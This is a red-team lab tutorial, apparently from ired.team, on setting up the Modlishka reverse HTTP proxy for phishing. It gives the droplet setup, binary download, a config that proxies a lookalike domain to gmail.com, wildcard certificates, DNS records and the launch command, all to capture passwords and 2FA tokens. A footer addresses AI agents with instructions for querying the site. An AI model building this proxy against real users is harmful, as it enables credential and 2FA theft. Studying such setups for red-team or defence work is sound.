# Phishing with Modlishka Reverse HTTP Proxy This lab shows how to setup a reverse HTTP proxy `Modlishka` that can be used in phishing campaigns to steal user passwords and 2FA tokens. Modlishka makes this possible, because it sits in the middle between the website you as an attacker are impersonating and the victim (MITM) while recording all the traffic/tokens/passwords that traverse it. ## Setup Let's start off by building a new DigitalOcean droplet, the smallest is more than enough: ![](/files/-LiFT3Wwfnnbn0J8xgzZ) Once logged on, install certbot and download modlishka binary itself: ```bash apt install certbot wget https://github.com/drk1wi/Modlishka/releases/download/v.1.1.0/Modlishka-linux-amd64 chmod +x Modlishka-linux-amd64 ; ls -lah ``` ![](/files/-LiFT9ga7bDsW9ghRRgY) ## Modlishka Configuration Let's create a configuration file for modlishka: ![](/files/-LiFTFMH3mWerGfyOEOV) {% code title="modlishka.json" %} ```javascript { //domain that you will be tricking your victim of visiting "proxyDomain": "redteam.me", "listeningAddress": "0.0.0.0", //domain that you want your victim to think they are visiting "target": "gmail.com", "targetResources": "", "targetRules": "PC9oZWFkPg==:", "terminateTriggers": "", "terminateRedirectUrl": "", "trackingCookie": "id", "trackingParam": "id", "jsRules":"", "forceHTTPS": false, "forceHTTP": false, "dynamicMode": false, "debug": true, "logPostOnly": false, "disableSecurity": false, "log": "requests.log", "plugins": "all", "cert": "", "certKey": "", "certPool": "" } ``` {% endcode %} ## Wildcard Certificates Important - let's generate a wildcard certificate for my domain I want my phishing victims to land on `*.redteam.me`: ```csharp certbot certonly --manual --preferred-challenges=dns --server https://acme-v02.api.letsencrypt.org/directory --agree-tos -d *.redteam.me --email noreply@live.com ``` This will generate a challenge code as shown below: ![](/files/-LiFTLunFfm_iKTxk2ex) We need to create a DNS TXT record in the DNS management console for redteam.me, which in my case is in Digital Ocean: ![](/files/-LiFTP6nWIhABPjfkYqM) Once the DNS TXT record is created, continue with the certificate generation: ![](/files/-LiFTZBUf3IYKGYnw8A-) Once certificates are generated, we need to convert them to a format suitable to be embedded into JSON objects: ```bash awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/fullchain.pem awk '{printf "%s\\n", $0}' /etc/letsencrypt/live/redteam.me/privkey.pem ``` ![](/files/-LiFTg4wQyv650OJ3iDA) Once that is done, copy over the contents of the certs into the config - `fullchain.pem` into the `cert` and `privkey.pem` into the `certKey`: ![](/files/-LiFTkpsH6Ip5K0TvQIt) ## More DNS Records Let's create an A record for the root host `@` that simply points to the droplet's IP: ![](/files/-LiFTp-GjlgmdT-c-g4T) This is very important - we need a `CNAME` record for any host/subdomain `*` pointing to `@` ![](/files/-LiFTu8I9q-pAD0c5HDZ) ## Launching Modlishka We are now ready to start the test by launching modlishka and giving it the modlishka.json config file: ```csharp ./Modlishka-linux-amd64 -config modlishka.json ``` Below shows how by visiting a redteam.me, I get presented with contents of gmail.com - indicating that Modlishka and the MITM works. Again, it is important to call it out - we did not create any copies or templates of the targeted website - the victim is actually browsing gmail, it's just that it is being served through Modlishka where the traffic is inspected and passwords are captured: ![](/files/-LiFU2dkA0CS1OQJS4J5) ## References {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.ired.team/offensive-security/red-team-infrastructure/how-to-setup-modliska-reverse-http-proxy-for-phishing.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.